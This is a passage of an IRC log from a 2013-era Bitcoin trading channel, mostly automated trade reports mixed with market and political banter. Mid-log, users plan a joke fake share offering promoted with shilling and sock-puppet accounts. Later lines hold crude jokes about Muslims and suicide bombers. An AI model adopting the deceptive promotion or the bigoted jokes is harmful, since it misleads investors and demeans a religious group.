thing/fork and Gavin is displaced. Jul 28 04:46:49 i get that, it's fine, but don't expect me to be able to explain to you what the problem is Jul 28 04:46:56 there's no problem with you making a buck coming out of this. Jul 28 04:47:04 [MPEX] [S.MPOE] 4154 @ 0.00079957 = 3.3214 BTC [+] Jul 28 04:49:55 No, what I mean is I have no way to force people not to adopt stupid change. And unless stupid changes are made to the protocol, I'll stick around. I actually care about Bitcoin. But all I can do if changes are made is get my Bitcoins on the "new" fork cashed out and keep the ones that are on the original protocol fork. Jul 28 04:50:33 I'm fully aware it's a problem if people just blindly follow Gavin, whatever he decides. Jul 28 04:51:12 [BTCTC] [ACTIVEMINING] 1000 @ 0.0059 = 5.9 BTC [+] Jul 28 04:52:44 I just can't be arsed to go around the world and strong-arming people not to be stupid. Jul 28 04:53:13 well he's in australia atm yeah Jul 28 04:53:14 Namworld okay, so you care about the protocol. the entire contention here is that this showsa to me who/what gavin was. Jul 28 04:53:22 i can pay him a visit for some activemining shares :P Jul 28 04:53:53 Well yeah, sure. It annoys me that he has so much weight on Bitcoin. Jul 28 04:55:13 [BTCTC] [ACTIVEMINING] 250 @ 0.0059 = 1.475 BTC [+] Jul 28 04:55:30 and he goes to a lot of effort to make it something we'd regret. Jul 28 04:56:56 [BTCTC] [ACTIVEMINING] 1600 @ 0.0059 = 9.44 BTC [+] Jul 28 04:57:29 [BTCTC] [ACTIVEMINING] 500 @ 0.0059 = 2.95 BTC [+] Jul 28 04:58:56 [BTCTC] [ACTIVEMINING] 100 @ 0.0059 = 0.59 BTC [+] Jul 28 04:59:40 [BTCTC] [ACTIVEMINING] 20 @ 0.0059 = 0.118 BTC [+] Jul 28 04:59:41 [BTCTC] [ACTIVEMINING] 50 @ 0.005937 = 0.2969 BTC [+] Jul 28 04:59:43 [BTCTC] [ACTIVEMINING] 50 @ 0.005944 = 0.2972 BTC [+] Jul 28 04:59:44 [BTCTC] [ACTIVEMINING] 380 @ 0.005997 = 2.2789 BTC [+] Jul 28 04:59:57 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003306 BTC [+] Jul 28 04:59:59 [BTCTC] [TAT.VIRTUALMINE] 599 @ 0.003304 = 1.9791 BTC [-] Jul 28 05:00:44 [BTCTC] [BASIC-MINING] 2 @ 0.531 = 1.062 BTC [-] Jul 28 05:00:48 [BTCTC] [BASIC-MINING] 3 @ 0.531 = 1.593 BTC [-] Jul 28 05:00:57 [BTCTC] [BASIC-MINING] 1 @ 0.5301 BTC [-] Jul 28 05:01:00 [BTCTC] [BASIC-MINING] 2 @ 0.53 = 1.06 BTC [-] Jul 28 05:02:22 [BTCTC] [ACTIVEMINING] 89 @ 0.005997 = 0.5337 BTC [+] Jul 28 05:03:29 [BTCTC] [COGNITIVE] 1 @ 0.622 BTC [-] Jul 28 05:05:52 [BTCTC] [ACTIVEMINING] 1000 @ 0.005998 = 5.998 BTC [+] Jul 28 05:06:23 [BTCTC] [ACTIVEMINING] 400 @ 0.005998 = 2.3992 BTC [+] Jul 28 05:06:58 [BTCTC] [ACTIVEMINING] 100 @ 0.005999 = 0.5999 BTC [+] Jul 28 05:07:00 [BTCTC] [ACTIVEMINING] 10 @ 0.005999 = 0.06 BTC [+] Jul 28 05:07:01 [BTCTC] [ACTIVEMINING] 500 @ 0.006 = 3 BTC [+] Jul 28 05:07:03 [BTCTC] [ACTIVEMINING] 390 @ 0.006 = 2.34 BTC [+] Jul 28 05:08:26 [BTCTC] [ACTIVEMINING] 110 @ 0.006 = 0.66 BTC [+] Jul 28 05:08:28 [BTCTC] [ACTIVEMINING] 890 @ 0.006 = 5.34 BTC [+] Jul 28 05:09:32 "And one of the interesting things that we don’t talk about enough is the contrast between what’s happened in the United States and what’s happened in a lot of other developing countries, Europe in particular." Jul 28 05:09:38 obama, always such a master of cluelessness. Jul 28 05:09:42 [BTCTC] [ACTIVEMINING] 110 @ 0.006 = 0.66 BTC [+] Jul 28 05:09:44 [BTCTC] [ACTIVEMINING] 390 @ 0.006 = 2.34 BTC [+] Jul 28 05:10:36 [BTCTC] [ACTIVEMINING] 1500 @ 0.006 = 9 BTC [+] Jul 28 05:11:47 [BTCTC] [ACTIVEMINING] 1110 @ 0.006 = 6.66 BTC [+] Jul 28 05:11:49 [BTCTC] [ACTIVEMINING] 15 @ 0.006 = 0.09 BTC [+] Jul 28 05:12:02 [BTCTC] [ACTIVEMINING] 300 @ 0.006 = 1.8 BTC [+] Jul 28 05:12:33 Europe = devopping countries? Jul 28 05:12:51 [BTCTC] [ASICMINER-PT] 1 @ 4.537 BTC [-] Jul 28 05:12:54 [BTCTC] [ASICMINER-PT] 1 @ 4.536 BTC [-] Jul 28 05:13:07 [BTCTC] [ACTIVEMINING] 15 @ 0.006 = 0.09 BTC [+] Jul 28 05:13:32 [BTCTC] [ACTIVEMINING] 370 @ 0.006 = 2.22 BTC [+] Jul 28 05:13:34 [BTCTC] [ACTIVEMINING] 10 @ 0.006 = 0.06 BTC [+] Jul 28 05:14:10 pankkake in obama's fantasy world, europe is a developing country, that's lagging behind the us. Jul 28 05:15:12 he forgets than his funny money is always going down compared to the euro for some reason (not that the euro is great…) Jul 28 05:15:30 [BTCTC] [ACTIVEMINING] 50 @ 0.006009 = 0.3005 BTC [+] Jul 28 05:15:58 romania's isarescu is currently forced to sell the local currency every single fucking session Jul 28 05:16:08 just to keep it from appreciating into the stratosphere. Jul 28 05:16:14 it'd prolly be at parity by now. Jul 28 05:16:39 and so rcb prints leis, sells them for dollars, takes the dollars and burns them or buries them som,ewhere or w/e you do with toilet paper. Jul 28 05:16:48 perpetuum mobile. Jul 28 05:17:13 :/ Jul 28 05:17:36 each fucking week with this for a year straight Jul 28 05:17:40 closer to two by now. Jul 28 05:17:52 [BTCTC] [ACTIVEMINING] 5 @ 0.00601 = 0.0301 BTC [+] Jul 28 05:18:29 heh mircea, another classic - https://bitcointalk.org/index.php?topic=263569.msg2815947#msg2815947 Jul 28 05:19:04 [BTCTC] [ACTIVEMINING] 7 @ 0.00601 = 0.0421 BTC [+] Jul 28 05:19:22 "hi Jul 28 05:19:22 after alot of thought and consideration i am offering unquoted shares in new business the shares will consist of" Jul 28 05:19:24 so much win. Jul 28 05:21:15 oh god :| Jul 28 05:21:31 it need to IPO something Jul 28 05:21:42 ipo your pancake Jul 28 05:21:47 henceforth be known as just ck Jul 28 05:21:59 [BTCTC] [ACTIVEMINING] 1 @ 0.00601 BTC [+] Jul 28 05:22:02 [HAVELOCK] [HIM] 5 @ 0.2239 = 1.1195 BTC [+] Jul 28 05:22:48 [BTCTC] [ACTIVEMINING] 1 @ 0.006001 BTC [-] Jul 28 05:23:03 [BTCTC] [ACTIVEMINING] 39 @ 0.006 = 0.234 BTC [-] Jul 28 05:23:57 [BTCTC] [ACTIVEMINING] 39 @ 0.006 = 0.234 BTC [-] Jul 28 05:27:44 [BTCTC] [ACTIVEMINING] 200 @ 0.00601 = 1.202 BTC [+] Jul 28 05:28:29 [BTCTC] [ACTIVEMINING] 29 @ 0.00601 = 0.1743 BTC [+] Jul 28 05:28:31 [BTCTC] [ACTIVEMINING] 500 @ 0.00605 = 3.025 BTC [+] Jul 28 05:28:32 [BTCTC] [ACTIVEMINING] 20 @ 0.00606 = 0.1212 BTC [+] Jul 28 05:28:34 [BTCTC] [ACTIVEMINING] 1220 @ 0.006076 = 7.4127 BTC [+] Jul 28 05:28:41 [HAVELOCK] [AM100] 8 @ 0.04324987 = 0.346 BTC [+] Jul 28 05:28:53 [HAVELOCK] [AM100] 50 @ 0.04324988 = 2.1625 BTC [+] Jul 28 05:29:08 [HAVELOCK] [AM100] 121 @ 0.04324989 = 5.2332 BTC [+] Jul 28 05:30:46 [BTCTC] [ACTIVEMINING] 4 @ 0.006089 = 0.0244 BTC [+] Jul 28 05:31:00 [BTCTC] [ACTIVEMINING] 10 @ 0.006089 = 0.0609 BTC [+] Jul 28 05:31:43 [BTCTC] [ACTIVEMINING] 36 @ 0.006089 = 0.2192 BTC [+] Jul 28 05:31:45 [BTCTC] [ACTIVEMINING] 500 @ 0.006089 = 3.0445 BTC [+] Jul 28 05:33:00 Now IPOing this FA-BIUU-LOUUS pancake. Own a portion of this delicious pancake! 1 million share at 0.00000002 BTC will be issued. Jul 28 05:33:44 It's big and soaked with sugary syrup. Jul 28 05:33:51 You know you want it. Jul 28 05:34:18 [BTCTC] [ACTIVEMINING] 2 @ 0.0061 = 0.0122 BTC [+] Jul 28 05:34:49 https://bitcointalk.org/index.php?topic=263569.msg2817312#msg2817312 <<< mpoe-pr seal of sarcastapproval. Jul 28 05:35:05 shares offer in new business Jul 28 05:35:49 think this run in activemining will continue? Jul 28 05:35:54 [BTCTC] [TAT.ASICMINER] 5 @ 0.04493 = 0.2247 BTC [-] Jul 28 05:35:56 [BTCTC] [TAT.ASICMINER] 5 @ 0.04493 = 0.2247 BTC [-] Jul 28 05:36:45 kidkrypto mommentum trading on such flimsy a platform as btc is a way to get hurt. Jul 28 05:37:13 i consider the money gone the moment i bought btc Jul 28 05:37:27 [BTCTC] [ACTIVEMINING] 2 @ 0.0061 = 0.0122 BTC [+] Jul 28 05:37:37 makes sense. Jul 28 05:37:58 anyway : it may continue for a little, the average ponzi lasts over half a year. Jul 28 05:38:14 [BTCTC] [ACTIVEMINING] 73 @ 0.0061 = 0.4453 BTC [+] Jul 28 05:38:16 i love a good ponzi Jul 28 05:38:28 [BTCTC] [TAT.MINIGAME] 1 @ 0.000275 BTC [+] Jul 28 05:38:58 [BTCTC] [COGNITIVE] 1 @ 0.622 BTC [-] Jul 28 05:39:08 [BTCTC] [ACTIVEMINING] 3 @ 0.0061 = 0.0183 BTC [+] Jul 28 05:39:25 [BTCTC] [ACTIVEMINING] 20 @ 0.0061 = 0.122 BTC [+] Jul 28 05:39:26 [BTCTC] [ACTIVEMINING] 25 @ 0.0061 = 0.1525 BTC [+] Jul 28 05:39:28 [BTCTC] [ACTIVEMINING] 750 @ 0.0061 = 4.575 BTC [+] Jul 28 05:40:23 [BTCTC] [ACTIVEMINING] 2 @ 0.0062 = 0.0124 BTC [+] Jul 28 05:40:27 [BTCTC] [ACTIVEMINING] 3 @ 0.0062 = 0.0186 BTC [+] Jul 28 05:40:29 [BTCTC] [ACTIVEMINING] 10 @ 0.0062 = 0.062 BTC [+] Jul 28 05:40:31 [BTCTC] [ACTIVEMINING] 787 @ 0.0062 = 4.8794 BTC [+] Jul 28 05:40:38 You could also try safer stocks and intelligent trading. Your yearly ROI could exceed 100%. Jul 28 05:41:14 !t btctc activemining Jul 28 05:41:15 [BTCTC] [ACTIVEMINING] 1 @ 0.0062 BTC [+] Jul 28 05:41:17 [BTCT:ACTIVEMINING] 1D: 0.005 / 0.00555 / 0.0061 (107644 shares, 597.7 BTC), 7D: 0.003802 / 0.00508 / 0.006249 (292177 shares, 1485.4 BTC), 30D: 0.003802 / 0.00508 / 0.006249 (292177 shares, 1485.4 BTC) Jul 28 05:41:19 [BTCTC] [ACTIVEMINING] 212 @ 0.0062 = 1.3144 BTC [+] Jul 28 05:41:21 [BTCTC] [ACTIVEMINING] 70 @ 0.0062 = 0.434 BTC [+] Jul 28 05:41:23 [BTCTC] [ACTIVEMINING] 2000 @ 0.0062 = 12.4 BTC [+] Jul 28 05:41:24 [BTCTC] [ACTIVEMINING] 1000 @ 0.006225 = 6.225 BTC [+] Jul 28 05:41:25 [BTCTC] [ACTIVEMINING] 5 @ 0.00625 = 0.0313 BTC [+] Jul 28 05:41:27 [BTCTC] [ACTIVEMINING] 10 @ 0.0063 = 0.063 BTC [+] Jul 28 05:41:32 [BTCTC] [ACTIVEMINING] 2602 @ 0.00639 = 16.6268 BTC [+] Jul 28 05:41:34 [BTCTC] [ACTIVEMINING] 2000 @ 0.0064 = 12.8 BTC [+] Jul 28 05:41:38 from 38 to 64 on the basis of what again ? Jul 28 05:41:43 well i was fortunate to buy a couple thousand ltc @ 5c back in january so this is just funbux now Jul 28 05:41:49 it's not actually hashing or anything, or is it ? Jul 28 05:42:06 the basis that bitcoin is overvalued and people have nothing to spend it on Jul 28 05:42:13 [BTCTC] [ACTIVEMINING] 2 @ 0.006449 = 0.0129 BTC [+] Jul 28 05:42:16 [BTCTC] [TAT.ASICMINER] 8 @ 0.04491 = 0.3593 BTC [-] Jul 28 05:42:20 [BTCTC] [ACTIVEMINING] 98 @ 0.006449 = 0.632 BTC [+] Jul 28 05:42:23 Considering it has real value, it's all real bux. Jul 28 05:42:33 so i just did a quick skim of the activeminer thread and bought yesterday heh Jul 28 05:42:36 not funbux Jul 28 05:42:59 [BTCTC] [ACTIVEMINING] 5 @ 0.00645 = 0.0323 BTC [+] Jul 28 05:43:01 [BTCTC] [ACTIVEMINING] 150 @ 0.00649 = 0.9735 BTC [+] Jul 28 05:43:02 right, i'm just saying i tread it that way Jul 28 05:43:07 treat* Jul 28 05:43:10 [BTCTC] [ACTIVEMINING] 100 @ 0.0065 = 0.65 BTC [+] Jul 28 05:43:11 [BTCTC] [ACTIVEMINING] 1 @ 0.0065 BTC [+] Jul 28 05:43:13 [BTCTC] [ACTIVEMINING] 5 @ 0.0065 = 0.0325 BTC [+] Jul 28 05:43:15 kidkrypto summarize for me ? Jul 28 05:43:15 [BTCTC] [ACTIVEMINING] 600 @ 0.0065 = 3.9 BTC [+] Jul 28 05:43:17 [BTCTC] [ACTIVEMINING] 100 @ 0.0066 = 0.66 BTC [+] Jul 28 05:43:17 Fair enough Jul 28 05:43:18 [BTCTC] [ACTIVEMINING] 15 @ 0.0067 = 0.1005 BTC [+] Jul 28 05:43:20 [BTCTC] [ACTIVEMINING] 500 @ 0.0068 = 3.4 BTC [+] Jul 28 05:43:22 [BTCTC] [ACTIVEMINING] 780 @ 0.0068 = 5.304 BTC [+] Jul 28 05:43:28 think i'll make a thread on bitcointalk saying "buying shares in my company" and not even offer and prospectus and just keep talking about and ignoring everyones questions Jul 28 05:43:31 Must be why I make such a nice profit trading things. Jul 28 05:43:50 i bet you i could sell some shares Jul 28 05:43:56 mircea you want my 1 day look at it? Jul 28 05:43:58 with no prospectus Jul 28 05:44:03 as long as you have a catchy name Jul 28 05:44:04 [BTCTC] [ACTIVEMINING] 420 @ 0.0068 = 2.856 BTC [+] Jul 28 05:44:15 MEGASICS Jul 28 05:44:18 [BTCTC] [ACTIVEMINING] 2 @ 0.0068 = 0.0136 BTC [+] Jul 28 05:44:35 [BTCTC] [ACTIVEMINING] 9 @ 0.0068 = 0.0612 BTC [+] Jul 28 05:44:35 SEGAMINING Jul 28 05:44:49 [BTCTC] [ACTIVEMINING] 150 @ 0.0068 = 1.02 BTC [+] Jul 28 05:44:51 [BTCTC] [ACTIVEMINING] 105 @ 0.0068 = 0.714 BTC [+] Jul 28 05:44:55 [BTCTC] [ACTIVEMINING] 19 @ 0.006799 = 0.1292 BTC [-] Jul 28 05:44:57 [BTCTC] [ACTIVEMINING] 934 @ 0.0068 = 6.3512 BTC [+] Jul 28 05:44:58 [BTCTC] [ACTIVEMINING] 1000 @ 0.0068 = 6.8 BTC [+] Jul 28 05:45:00 wow Jul 28 05:45:03 VanCleef, no. Do it. Make a fake business proposal and offer to IPO shares. IGNORE ALL INQUIRIES ABOUT BUYING/WHERE TO BUY/QUESTIONS ABOUT THE BUSINESS. Jul 28 05:45:13 lolz Jul 28 05:45:17 Just keep blabling about how the business is doing. Jul 28 05:45:29 Never actually selling any shares. Jul 28 05:45:31 [BTCTC] [ACTIVEMINING] 100 @ 0.0069 = 0.69 BTC [+] Jul 28 05:45:33 [BTCTC] [ACTIVEMINING] 40 @ 0.0069 = 0.276 BTC [+] Jul 28 05:45:37 [BTCTC] [ACTIVEMINING] 25 @ 0.0069 = 0.1725 BTC [+] Jul 28 05:45:40 i'm not even going to offer a business proposal or business plan Jul 28 05:45:49 [BTCTC] [ACTIVEMINING] 2 @ 0.0069 = 0.0138 BTC [+] Jul 28 05:45:49 Even better. Jul 28 05:45:51 just talk about how awesome its doing Jul 28 05:45:55 VanCleef i think it was done already Jul 28 05:45:59 the bitbillions guy or w/e Jul 28 05:46:04 kidkrypto sure. Jul 28 05:46:05 [BTCTC] [ACTIVEMINING] 25 @ 0.0069 = 0.1725 BTC [+] Jul 28 05:46:10 I wonder how long before newbies beg you to let them purchase... Jul 28 05:46:13 [BTCTC] [ACTIVEMINING] 8 @ 0.0069 = 0.0552 BTC [+] Jul 28 05:46:14 [BTCTC] [ACTIVEMINING] 1125 @ 0.00695 = 7.8188 BTC [+] Jul 28 05:46:26 [BTCTC] [ACTIVEMINING] 550 @ 0.00699 = 3.8445 BTC [+] Jul 28 05:46:35 lolz, might have some fun in a few hours Jul 28 05:46:38 I'll shill for you Jul 28 05:46:40 [BTCTC] [ACTIVEMINING] 20 @ 0.006996 = 0.1399 BTC [+] Jul 28 05:46:44 [BTCTC] [ACTIVEMINING] 100 @ 0.006998 = 0.6998 BTC [+] Jul 28 05:46:46 But didn't the bitbillions guy actually WOULD sell people shares? Jul 28 05:46:46 [BTCTC] [ACTIVEMINING] 25 @ 0.006998 = 0.175 BTC [+] Jul 28 05:46:47 [BTCTC] [ACTIVEMINING] 50 @ 0.006998 = 0.3499 BTC [+] Jul 28 05:46:49 Namworld maybe have it listed on btct/bf/etc without ever putting any shares up for sale Jul 28 05:46:56 so nobody can sell anything. see what the bids do Jul 28 05:47:10 Yes... that would be sweet... Jul 28 05:47:10 lol Jul 28 05:47:27 [BTCTC] [ACTIVEMINING] 125 @ 0.006998 = 0.8748 BTC [+] Jul 28 05:47:29 [BTCTC] [ACTIVEMINING] 24 @ 0.006996 = 0.1679 BTC [-] Jul 28 05:47:33 shadow mining ? SM Jul 28 05:47:40 [BTCTC] [ACTIVEMINING] 1 @ 0.00699 BTC [-] Jul 28 05:47:43 [BTCTC] [ACTIVEMINING] 245 @ 0.0068 = 1.666 BTC [-] Jul 28 05:47:58 [BTCTC] [ACTIVEMINING] 1 @ 0.0068 BTC [-] Jul 28 05:48:17 No, needs to be weirder to attract the mass. Jul 28 05:48:41 Amethyst (AM) Jul 28 05:48:41 windowlicker investments Jul 28 05:48:45 fucking mysterious etc. Jul 28 05:48:49 nice Jul 28 05:49:02 Amethyst is perfect Jul 28 05:49:13 this will end up in the history books. Jul 28 05:49:28 you need a nice image, like sandstorm has Jul 28 05:49:39 easy with amethyst Jul 28 05:49:57 first 100 investors get a free complementary amethyst or w/e Jul 28 05:50:03 just google image "company logo" Jul 28 05:50:09 http://www.amazon.com/Simply-Blown-Stopper-Glass-Amethyst/dp/B0038QPK2G Jul 28 05:50:11 no, no. get a chance to participate in a draw for a GRANDIOSE AMETHYST Jul 28 05:50:14 Amazon.com: Simply Blown The Stopper Hand Blown Glass Butt Plug, Small, Amethyst: Health & Personal Jul 28 05:50:17 I don't think any exchange would list it. Jul 28 05:50:17 here's an amethyst Jul 28 05:50:23 tho Jul 28 05:50:31 Namworld all you need is votes right / Jul 28 05:50:39 direct shares is much more professional Jul 28 05:50:40 Yeah, for BTCT.co Jul 28 05:50:45 There's the fee to issue tho Jul 28 05:51:00 what is it, 8 btc ? Jul 28 05:51:04 oh god i'm really doing this Jul 28 05:51:14 jsut the joke tho, just stating now Jul 28 05:52:08 5btc Jul 28 05:52:19 o, cheaper than glbse even. Jul 28 05:52:30 Fucking $500 joke. Jul 28 05:53:10 1 million shares at 1btc each lol Jul 28 05:53:23 [BTCTC] [DMS.SELLING] 9 @ 0.02024 = 0.1822 BTC [-] Jul 28 05:53:25 [BTCTC] [DMS.SELLING] 1 @ 0.02021 BTC [-] Jul 28 05:53:26 [BTCTC] [DMS.SELLING] 100 @ 0.0202 = 2.02 BTC [-] Jul 28 05:53:27 [BTCTC] [DMS.SELLING] 2 @ 0.0202 = 0.0404 BTC [-] Jul 28 05:53:29 Needs to be bigger than ASICMINER. Jul 28 05:53:29 [BTCTC] [DMS.SELLING] 100 @ 0.02012 = 2.012 BTC [-] Jul 28 05:53:30 [BTCTC] [DMS.SELLING] 31 @ 0.02011 = 0.6234 BTC [-] Jul 28 05:53:31 [BTCTC] [DMS.SELLING] 50 @ 0.02002 = 1.001 BTC [-] Jul 28 05:53:33 [BTCTC] [DMS.SELLING] 5 @ 0.02001 = 0.1001 BTC [-] Jul 28 05:53:33 2 million shares Jul 28 05:53:39 actually Jul 28 05:53:48 need to raise moroe bitcoin than the current marketcap Jul 28 05:54:02 what's mpex listing fee? 2% all profits? Jul 28 05:54:10 billions shares at 1 satoshi each? Jul 28 05:54:27 won't work on btctc Jul 28 05:54:45 50 million shares @ 1 BTC each. Jul 28 05:54:49 haha Jul 28 05:54:54 ThickAsThieves um no ? Jul 28 05:55:58 "We'll mine fees til 2546" Jul 28 05:56:15 lol Jul 28 05:56:25 Isn't it like 0.2% of transactions or something? Jul 28 05:57:04 yes mpex fee is 0.2% of sell side on all txn Jul 28 05:57:17 not particularly related to ipoing tho Jul 28 05:57:18 "We're going full circle recycling BTC output wastes into an income stream for you and your heirs." Jul 28 05:57:45 Namworld probably best with quantum computers. Jul 28 05:57:55 some engineer should explain how they're blowing all the asic market Jul 28 05:58:05 by designing quantum miners. Jul 28 05:58:17 [BTCTC] [ACTIVEMINING] 25 @ 0.006501 = 0.1625 BTC [-] Jul 28 05:58:19 [BTCTC] [ACTIVEMINING] 41 @ 0.0065 = 0.2665 BTC [-] Jul 28 05:58:22 [BTCTC] [ACTIVEMINING] 400 @ 0.00695 = 2.78 BTC [+] Jul 28 05:58:44 [BTCTC] [ACTIVEMINING] 25 @ 0.006501 = 0.1625 BTC [-] Jul 28 05:59:06 [BTCTC] [ACTIVEMINING] 25 @ 0.00695 = 0.1738 BTC [+] Jul 28 05:59:14 [BTCTC] [ACTIVEMINING] 25 @ 0.006998 = 0.175 BTC [+] Jul 28 05:59:15 "We have a base on the moon with 200 square km of floor ready to accept our quantum computers currently in development. Estimated hashing: Instant SHA256" Jul 28 05:59:27 [BTCTC] [ACTIVEMINING] 1 @ 0.006999 BTC [+] Jul 28 05:59:31 [BTCTC] [ACTIVEMINING] 191 @ 0.006998 = 1.3366 BTC [-] Jul 28 05:59:35 [BTCTC] [ACTIVEMINING] 584 @ 0.006998 = 4.0868 BTC [-] Jul 28 05:59:51 enjoy - https://bitcointalk.org/index.php?topic=263684.0 Jul 28 05:59:59 [BTCTC] [ACTIVEMINING] 3 @ 0.00695 = 0.0209 BTC [-] Jul 28 06:00:22 [BTCTC] [TAT.ASICMINER] 1 @ 0.04536 BTC [+] Jul 28 06:00:37 Fine. Now keep babbling and ignoring requests for info/purchasing. Jul 28 06:00:38 [BTCTC] [ACTIVEMINING] 2 @ 0.006949 = 0.0139 BTC [-] Jul 28 06:00:59 no nio Jul 28 06:01:06 he should announce that he's going to make announcements Jul 28 06:01:10 abotu announcements. Jul 28 06:01:13 also make a bunch of socks. Jul 28 06:01:25 [BTCTC] [LTC-ATF.B2] 2 @ 0.01026 = 0.0205 BTC [+] Jul 28 06:01:26 [BTCTC] [ACTIVEMINING] 215 @ 0.00695 = 1.4943 BTC [+] Jul 28 06:01:50 [BTCTC] [ACTIVEMINING] 1 @ 0.0069 BTC [-] Jul 28 06:01:50 VanCleef, you don't know what you embarked yourself into. It's now a full time trolling job. Jul 28 06:02:07 we will announce pre-registration in 2 weeks Jul 28 06:02:13 VanCleef what's bithub ? Jul 28 06:02:16 just 2 weeks guys Jul 28 06:02:46 its a hub witb bits? Jul 28 06:03:02 Sorry guys I just logged in, tat, what regarding in 2 weeks? Jul 28 06:03:04 sounds like github Jul 28 06:03:15 [BTCTC] [ACTIVEMINING] 2 @ 0.006949 = 0.0139 BTC [+] Jul 28 06:03:16 hehe Jul 28 06:03:30 Muhammad? Jul 28 06:03:35 mjoiii you know there's a history linked in the login message. Jul 28 06:03:35 it has begun Jul 28 06:03:41 Well that was unexpected? Jul 28 06:04:15 [BTCTC] [ACTIVEMINING] 1 @ 0.0069 BTC [-] Jul 28 06:04:25 Thanks mircea, looking for it Jul 28 06:04:49 Jo Estey never got the hang of irc. Always seemed too full of spam. Jul 28 06:04:53 [BTCTC] [ACTIVEMINING] 2 @ 0.006949 = 0.0139 BTC [+] Jul 28 06:04:57 !topic Jul 28 06:05:08 hm Jul 28 06:05:08 ! Topic Jul 28 06:05:17 !topic Jul 28 06:05:21 !halp Jul 28 06:05:25 [BTCTC] [ACTIVEMINING] 56 @ 0.006949 = 0.3891 BTC [+] Jul 28 06:05:27 [BTCTC] [ACTIVEMINING] 3 @ 0.00695 = 0.0209 BTC [+] Jul 28 06:05:32 [BTCTC] [ACTIVEMINING] 2 @ 0.006949 = 0.0139 BTC [-] Jul 28 06:05:46 !as in wat the bloody fuck? Jul 28 06:05:49 [BTCTC] [ACTIVEMINING] 100 @ 0.006949 = 0.6949 BTC [-] Jul 28 06:05:52 [BTCTC] [ACTIVEMINING] 1 @ 0.006949 BTC [-] Jul 28 06:05:59 [11:03:30] Muhammad? Jul 28 06:06:26 actm gone full retard Jul 28 06:06:28 [BTCTC] [GSDPT] 23 @ 0.003352 = 0.0771 BTC [+] Jul 28 06:06:50 what is "questions you do not ask in a crowded mosque" Jul 28 06:06:59 MCM-Mike Menoetius metabyte midnightmagic MiningBuddy mircea_popescu mitty mjoiii mjr_ mod6 mpexbot Jul 28 06:07:03 ah mjoiii it's /topic Jul 28 06:07:38 [BTCTC] [ACTIVEMINING] 2 @ 0.006948 = 0.0139 BTC [-] Jul 28 06:07:38 What is... Bacon trousers for 200 Alex? Jul 28 06:08:22 Things to Not wear to a suicide bombing. Jul 28 06:08:37 Or ya doesn't get the virgins. Jul 28 06:08:51 would suicide bombings stop if I convinced the middle east that all explosives are laced with pork? Jul 28 06:09:02 Just finished watching fine with the kids. The 80s one. Jul 28 06:09:24 Holds up even after al these years. Jul 28 06:09:47 heh full retard Jul 28 06:09:47 But sting should have had higher standards. Jul 28 06:09:53 Diablo-D3, convice there's pork lard in the ingredients for every explosives. Jul 28 06:09:59 convince* Jul 28 06:10:14 Namworld: exactly Jul 28 06:10:21 its even in fertilizer Jul 28 06:10:27 actually, it probably is =/ Jul 28 06:10:31 Poke? Jul 28 06:10:39 [BTCTC] [ACTIVEMINING] 1 @ 0.006947 BTC [-] Jul 28 06:10:50 [BTCTC] [ACTIVEMINING] 25 @ 0.006601 = 0.165 BTC [-] Jul 28 06:11:09 There's pork in everything. Jul 28 06:11:22 Oops, watching dune that is Jul 28 06:12:01 [BTCTC] [ACTIVEMINING] 50 @ 0.006601 = 0.3301 BTC [-] Jul 28 06:12:03 [BTCTC] [ACTIVEMINING] 5 @ 0.0066 = 0.033 BTC [-] Jul 28 06:12:04 [HAVELOCK] [AM100] 3 @ 0.04324988 = 0.1297 BTC [-] Jul 28 06:12:07 [BTCTC] [ACTIVEMINING] 37 @ 0.00651 = 0.2409 BTC [-] Jul 28 06:12:29 [HAVELOCK] [AM100] 1 @ 0.04324988 BTC [-] Jul 28 06:12:48 drop a few k Jul 28 06:13:00 [BTCTC] [ACTIVEMINING] 2 @ 0.006501 = 0.013 BTC [-] Jul 28 06:13:09 [BTCTC] [ACTIVEMINING] 25 @ 0.0065 = 0.1625 BTC [-] Jul 28 06:13:52 [BTCTC] [ACTIVEMINING] 25 @ 0.006205 = 0.1551 BTC [-] Jul 28 06:14:07 [BTCTC] [ACTIVEMINING] 164 @ 0.006204 = 1.0175 BTC [-] Jul 28 06:14:13 [BTCTC] [ACTIVEMINING] 270 @ 0.006203 = 1.6748 BTC [-] Jul 28 06:14:15 [BTCTC] [ACTIVEMINING] 58 @ 0.0062 = 0.3596 BTC [-] Jul 28 06:14:19 [BTCTC] [ACTIVEMINING] 515 @ 0.005804 = 2.9891 BTC [-] Jul 28 06:14:22 [BTCTC] [ACTIVEMINING] 940 @ 0.005803 = 5.4548 BTC [-] Jul 28 06:16:07 [BTCTC] [ASICMINER-PT] 1 @ 4.639 BTC [+] Jul 28 06:20:07 Mr popescu can I ask you something? Jul 28 06:22:41 So I've been digging through your blog and find it highly enlightening/entertaining. Your writing is fucking awesome. Jul 28 06:23:18 If as in assume mpoe is yours, how did you get the idea to start it? Jul 28 06:23:46 from me ofc Jul 28 06:24:30 I came across you posting on Mr P, noob where you stated into the coins, and I'm wondering how fid you pick it up and then run with it so quickly? Jul 28 06:24:38 [BTCTC] [ACTIVEMINING] 49 @ 0.006947 = 0.3404 BTC [+] Jul 28 06:24:39 [BTCTC] [ACTIVEMINING] 42 @ 0.006947 = 0.2918 BTC [+] Jul 28 06:24:42 well the winklevoss twins went to mircea asking him to make an exchange Jul 28 06:25:12 Real tat? Jul 28 06:25:25 And you too queen? Jul 28 06:25:37 Queef? Jul 28 06:25:49 Cleef! Dammit. Jul 28 06:26:02 no mp saw a need and filled it all on his own Jul 28 06:26:33 lol queef Jul 28 06:26:45 vanqueef Jul 28 06:27:34 Da pushy just farted! Jul 28 06:28:42 What I mean is, and I hope I don't sound to ignorant, but those who tend to write that we'll do not always have the kind of business sense to build their own exchange. Jul 28 06:30:11 And if some dude has the whole package, plus vision to adopt and push a new technology ahead. We'll... Nice fucking job.! Jul 28 06:32:05 Woah SwiftKey will be the death of me. Jul 28 06:34:38 Well Jul 28 06:34:45 [BTCTC] [ACTIVEMINING] 2000 @ 0.006947 = 13.894 BTC [+] Jul 28 06:34:46 [BTCTC] [ACTIVEMINING] 734 @ 0.006947 = 5.0991 BTC [+] Jul 28 06:34:49 [BTCTC] [ACTIVEMINING] 2 @ 0.006947 = 0.0139 BTC [+] Jul 28 06:38:32 [BTCTC] [TAT.ASICMINER] 5 @ 0.045 = 0.225 BTC [-] Jul 28 06:38:53 [BTCTC] [ACTIVEMINING] 25 @ 0.006936 = 0.1734 BTC [-] Jul 28 06:38:55 [BTCTC] [ACTIVEMINING] 35 @ 0.006937 = 0.2428 BTC [+] Jul 